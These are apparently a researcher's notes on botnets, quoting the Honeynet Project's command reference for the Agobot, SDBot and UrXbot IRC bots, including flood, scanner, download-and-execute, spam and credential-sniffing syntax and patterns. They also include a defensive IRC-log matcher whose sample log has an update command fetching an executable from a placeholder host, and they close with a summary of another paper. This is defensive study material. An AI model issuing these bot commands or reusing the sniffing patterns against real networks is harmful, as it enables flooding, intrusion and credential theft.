Agobot, SDbot, URXbot Sample Commands

Excerpt from http://www.honeynet.org/book/export/html/50

A good look into the basic configurations and commands for three common bots. I think that, given the time frame and the desire to produce admirable results (having to complete a background check, I cannot yet deploy a Honeynet on University property; this should be accomplished by the middle of next week), and having looked at the current research and the various advances and deficits, I am greatly considering looking into the updating behavior and cycles of various botnets. Research in this realm should be very conducive towards better arming IT personnel, in that more effective IDS and IPS systems can be implemented if network admins are more knowledgeable about the evolution and progressive algorithm enhancement of various bots, categorized by attack type, cloning strategy, host IP ranges, lifespan, and update cycle. If a trend emerges in the data gathered that can accurately predict what type of bot is most likely going to connect to which one of your ports and with what command, a much tighter filter can be placed, allowing administrators to better capture the botnet types they desire to study. Research in this realm could also make for more predictable server stability in the long run by providing data for optimized server updating schedules. Of course the desires and objectives of each given party are different, and thus configurations based on acquired data would be user specific.

A second realm in which I intend to gather data is the various bots' ability to remain connected while various port configurations are enacted. I have not yet seen enough satisfying data on this topic; although scanning mechanisms and “most frequent port lists” are known, I want to determine whether any of the bots are intelligent enough to connect to more stable ports, either by randomly selecting ports to attempt connection or by algorithmic sequencing. This activity would have to be monitored during a live session with an intrusive bot facing massive disconnections and reopening of ports. Hopefully comprehensible and applicable port sequences do emerge that can help distinguish extremely well programmed bots and allow for further study into the most elite botnets.

In the following, we cover the more popular commands implemented in the common bots we have captured in the wild. Presenting all the commands is beyond the scope of this paper, as Agobot comes along with over 90 commands in the default configuration.

1. DDoS something
* Agobot
o ddos.stop
stops all floods
o ddos.phatwonk [host] [time] [delay]
starts leet flood
Starts a SYN-flood on ports 21,22,23,25,53,80,81,88,
110,113,119,135,137,139,143,443,445,1024,1025,1433,
1500,1720,3306,3389,5000,6667,8000,8080

o ddos.phatsyn [host] [time] [delay] [port]
starts syn flood
o ddos.phaticmp [host] [time] [delay]
starts icmp flood
o ddos.synflood [host] [time] [delay] [port]
starts a SYN flood
o ddos.updflood [host] [port] [time] [delay]
starts a UDP flood
o ddos.targa3 [host] [time]
starts a targa3 flood
Implements the well known DDoS attack Mixter authored in 1999.

/*
* targa3 - 1999 (c) Mixter
*
* IP stack penetration tool / 'exploit generator'
* Sends combinations of uncommon IP packets to hosts
* to generate attacks using invalid fragmentation, protocol,
* packet size, header values, options, offsets, tcp segments,
* routing flags, and other unknown/unexpected packet values.
* Useful for testing IP stacks, routers, firewalls, NIDS,
* etc. for stability and reactions to unexpected packets.
* Some of these packets might not pass through routers with
* filtering enabled - tests with source and destination host
* on the same ethernet segment gives best effects.
*/
taken from
http://packetstormsecurity.org/DoS/targa3.c

o ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts a HTTP flood
This is real nasty since it fetches websites from a webserver.
If “recursive” is set, the bot parses the replies and follows
links recursively.
* SDBot
o syn [ip] [port] [seconds|amount] [sip] [sport] [rand] (sdbot 05b pure version)
o udp [host] [num] [size] [delay] [[port]] (sdbot 05b ago version)
o ping [host] [num] [size] [delay]
* UrXbot
o ddos.(syn|ack|random) [ip] [port] [length]
o (syn|synflood) [ip] [port] [length]
o (udp|udpflood|u) [host] [num] [size] [delay] [[port]]
o (tcp|tcpflood) (syn|ack|random) [ip] [port] [time]
o (ping|pingflood|p) [host] [num] [size] [delay]
o (icmpflood|icmp) [ip] [time]
o ddos.stop
o synstop
o pingstop
o udpstop
2. Spreading
* Agobot
o scan.addnetrange [255.255.255.255/32] [priority]
o scan.delnetrange [255.255.255.255/32]
o scan.listnetranges
lists scanned netranges
o scan.clearnetranges
clears netranges
o scan.resetnetranges
removes all netranges from the scanner and adds the local LAN as scanning range
o scan.enable [scanner]
[scanner] can be one of
Anubis Bagle CPanel DCOM DCOM2 Doom DW Ethereal HTTP Locator LSASS NetBios Optix SQL UPNP WKS
o scan.disable [scanner]
[scanner] can be the same as above
o scan.startall
starts all scanners
o scan.stopall
stops all scanners
o scan.start
starts all enabled scanners
o scan.stop
stops all scanners
o scan.stats
replies with stats about exploits per scanner
o scan.host [255.255.255.255[:port]]
If given with port, just tries to exploit the host with the scanners fitting the ports, else all scanners are used.
* SDBot & UrXBot
o (scanall|sa)
o (scanstats|stats)
o scandel [port|method]
[method] can be one of webdav ntpass netbios dcom135 dcom445 dcom1025 dcom2 iis5ssl mssql beagle1 beagle2 mydoom lsass_445 lsass_139 optix upnp netdevil DameWare kuang2 sub7
o scanstop
o (advscan|asc) [port|method] [threads] [delay] [minutes]
3. Downloading files from the internet
* Agobot
o http.download
download a file via HTTP
o http.execute
updates the bot via the given HTTP URL
o http.update
executes a file from a given HTTP URL
o The same commands are also available via FTP
* SDBot & UrXBot
o (update|up) [url] [botid]
o (download|dl) [url] [[runfile?]] [[crccheck]] [[length]]
4. Local file IO
* SDBot & UrXBot
o (execute|e) [path]
o (findfile|ff) filename
o (rename|mv) [from] [to]
o findfilestopp
5. Sending Spam
* Agobot
o cvar.set spam_aol_channel [channel]
AOL Spam – Channel name
o cvar.set spam_aol_enabled [1/0]
AOL Spam – Enabled?
o cvar.set spam_maxthreads [8]
Spam Logic – Number of threads
o cvar.set spam_htmlemail [1/0]
Spam Logic – Send HTML emails
o cvar.set aolspam_maxthreads [8]
AOL Spam Logic – Number of threads
o spam.setlist
downloads list with email-addresses to spam them
o spam.settemplate
downloads an email template
o spam.start
starts the spamming
o spam.stop
stops the spamming
o aolspam.setlist
AOL Spam – downloads an email list
o aolspam.settemplate
AOL – downloads an email template
o aolspam.setuser
AOL – sets an username
o aolspam.setpass
AOL – sets a password
o aolspam.start
AOL – starts the spamming
o aolspam.stop
AOL – stops the spamming
* SDBot
So far, SDBot does not implement dedicated spamming methods. But other options to send spam are possible: the spammer uses the “download” command to download and execute a SOCKSv4/v5 server. The server publishes its IP address and SOCKS port in a file on a webserver. Via this backdoor, spam can be sent.

* UrXBot
o email [server] [port] [srcmail] [dstmail] [mailsubj]
6. Sniffing
* Agobot
Agobot's sniffing is really “advanced”: if you compile the bot with sniffing enabled, it drops a stripped-down libpcap DLL on startup and registers it as a system driver. The sniffing thread then uses libpcre to look out for bot commands.

o HTTP
Commented: Like paypals? ;-D How about cookies? YUMMEH! -rain

Checks for "PAYPAL" "SET-COOKIE"
o SSH
Commented: I don't get the idea, but the famous lsass author Nils contributed this and comments it
// SSH - works - after the RSA key is sent, the login and pass is sent raw. Believe me. -Nils
Checks for "login as:" "password:" "putty" "SECURECRT"
o CPANEL
Commented: Like configuring Domains ? Here you go ! -Nils
Checks for "cPanel" "Set-Cookie:"
o IRC
Checks for:
"^:(.*)!(.*)@(.*) ((?i)PRIVMSG|NOTICE) (.*) :(.)((?i)login|auth|id|ident|hashin|secure|l) (.*)$"
"^((?i)oper )(.*)"
"^:(.*) 381 (.*) :(.*)"
"^((?i)nickserv identify) (.*)$"
"^:.* ((?i)notice|privmsg) (.*) :Password accepted.*"
Botnet DDoS:
"^:(.*)!(.*)@(.*) ((?i)PRIVMSG|NOTICE) (.*) :(.)((?i)ddos|packet|flood|udp|syn|pfast|coldrage|syn3|syn2|targa|icmp|fuck|random) (.*)$"

o FTP
Checks for:
"^((?i)USER )(.*)"
"^((?i)PASS )(.*)"
"^(230 )(.*)"

o cvar.set sniffer_enabled 1/0
o cvar.set sniffer_channel [destinationchannel]
sets the destinations channel to which the results should be logged
o sniffer.addstring [pcre]
adds a user-defined string to the sniffer
o sniffer.delstring [pcre]
deletes a user-defined string from the sniffer
* SDBot
SDBot's sniffing is based on Windows raw socket listening. Compared to the way Agobot's sniffing is implemented, this way is ineffective and poor: the bot even sniffs its own traffic and recognizes it as sniffed traffic. In addition, SDBot lacks PCRE support and uses strstr() for comparison.

o HTTP Checks for: paypal PAYPAL paypal.com PAYPAL.COM Set-Cookie:
o IRC
Checks for the following strings: :.login :,login :!login :@login :$login :%login :^login :&login :*login :-login :+login :/login :\\login :=login :?login :'login :`login :~login : login :.auth :,auth :!auth :@auth :$auth :%auth :^auth :&auth :*auth :-auth :+auth :/auth :\\auth :=auth :?auth :'auth :`auth :~auth : auth :.id :,id :!id :@id :$id :%id :^id :&id :*id :-id :+id :/id :\\id :=id :?id :'id :`id :~id : id :.hashin :!hashin :$hashin :%hashin :.secure :!secure :.l :!l :$l :%l :.x :!x :$x :%x :.syn :!syn :$syn :%syn CDKey JOIN # NICK OPER oper now an IRC Operator
o carnivore [on/off]
7. Cloning
* Agobot
o For some reason, our Agobot lacks cloning capabilities
* SDBot & UrXBot
o (clone|c) [host] [port] [channel] [[chanpass]]
o clonestop [clonenumber]
o (c_raw|c_r) [clonenumber] [raw irc command]
o (c_mode|c_m) [clonenumber][some irc mode]
o (c_nick|c_n) [clonenumber] [newnick|$randnick]
o (c_join|c_j) [clonenumber] [channel]
o (c_part|c_p) [clonenumber] [channel]
o (c_privmsg|c_pm) [clonenumber] [dest nick or channel] [msg]
o (c_action|c_a) [clonenumber] [dest nick or channel] [msg]
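A defender-side example, added here and not part of the Honeynet excerpt or of any bot's code: a small Python matcher that recognises the command vocabulary listed in sections 1 to 7 above inside IRC PRIVMSG/NOTICE lines, the way an IRC-server log filter or IDS rule set might flag C&C traffic. The prefix character class is taken from the SDBot sniffer string list above; the family names, the rule that bare SDBot/UrXbot keywords count only behind a prefix, and the sample log lines are my own assumptions and constructions.

```python
import re
from typing import Dict, List, Optional

# Command vocabulary from the Agobot / SDBot / UrXbot lists above, grouped by purpose. Agobot
# commands are dotted "module.command" names; SDBot/UrXbot keywords are typed behind a prefix
# character (the same prefixes the SDBot IRC sniffer list above matches).
FAMILIES = {
    "ddos": r"ddos\.\w+|synflood|udpflood|tcpflood|pingflood|icmpflood|synstop|udpstop|pingstop"
            r"|syn|udp|tcp|ping|icmp|u|p",
    "spread": r"scan\.\w+|advscan|asc|scanall|sa|scanstats|scandel|scanstop",
    "fetch": r"(?:http|ftp)\.(?:download|execute|update)|update|up|download|dl|execute|e",
    "spam": r"(?:aol)?spam\.\w+|email",
    "sniff": r"sniffer\.\w+|carnivore",
    "clone": r"clone|clonestop|c_\w+|c",
    "auth": r"login|auth|id|ident|hashin|secure|l",
}
COMMAND_RE = re.compile(
    r"^(?P<prefix>[.,!@$%^&*+/\\=?'`~-])?(?:"
    + "|".join(f"(?P<{name}>{pat})" for name, pat in FAMILIES.items())
    + r")(?:\s|$)", re.IGNORECASE)
# ":nick!user@host PRIVMSG target :text", the shape the Agobot IRC sniffer patterns key on too.
IRC_RE = re.compile(r"^:(?P<nick>[^!\s]+)!(?P<user>[^@\s]+)@(?P<host>\S+) "
                    r"(?P<type>PRIVMSG|NOTICE) (?P<target>\S+) :(?P<text>.*)$", re.IGNORECASE)

def classify(line: str) -> Optional[Dict[str, str]]:
    """Return who issued which bot command to whom, or None for an ordinary IRC line."""
    m = IRC_RE.match(line.strip())
    c = COMMAND_RE.match(m["text"]) if m else None
    if not c:
        return None
    fam = next(name for name in FAMILIES if c.group(name))
    cmd = c.group(fam).lower()
    if "." not in cmd and not c["prefix"]:  # bare keyword, no prefix: "update me later" is chat
        return None
    return {"nick": m["nick"], "host": m["host"], "target": m["target"],
            "command": cmd, "family": fam}

def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify() over IRC log lines and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log for this example (not a real capture); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    ":herder!x@203.0.113.9 PRIVMSG #c :.login s3cr3t",
    ":herder!x@203.0.113.9 PRIVMSG #c :ddos.synflood 192.0.2.10 600 0 80",
    ":herder!x@203.0.113.9 PRIVMSG #c :scan.startall",
    ":herder!x@203.0.113.9 PRIVMSG #c :!advscan lsass_445 200 5 0",
    ":herder!x@203.0.113.9 PRIVMSG bot42 :http.update http://example.invalid/b.exe",
    ":alice!a@198.51.100.7 PRIVMSG #c :are you up for lunch? ping me",
]
```

Single-letter aliases such as `.c` or `.p` will still fire on any chat line that happens to start with them, so in practice the hits are best scored per nick and channel rather than alerted on individually.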

“Botnet Attack and Analysis” Tynan Wilk

A short paper which discusses the recurring theme of invading IRC chat rooms as a way of attacking, and of detecting potential and existing botnets. The author provides a sample HTTP GET request and details on how to utilize Google as a detection mechanism for discovering vulnerable targets that are likely to become zombies in the future. The paper reaches its climax with the author giving a brief synopsis of what exactly happened upon entry into an IRC chat room in which he had the rare chance to actually speak with one of the “herders” in person. The herder was actually not threatened at all by the presence of the author (in the sense that he was annoyed rather than alarmed), and banned him, leaving him with the statement that the author was a rare and lucky case not to have been infected, but that new attacks were being developed so that one day this luck would eventually fade if the author did not keep up with the technology gap between intruder and victim. Quite a few themes seem to be recurring in these papers, and none of them seem to be indicative of a positive outlook for the future of network security.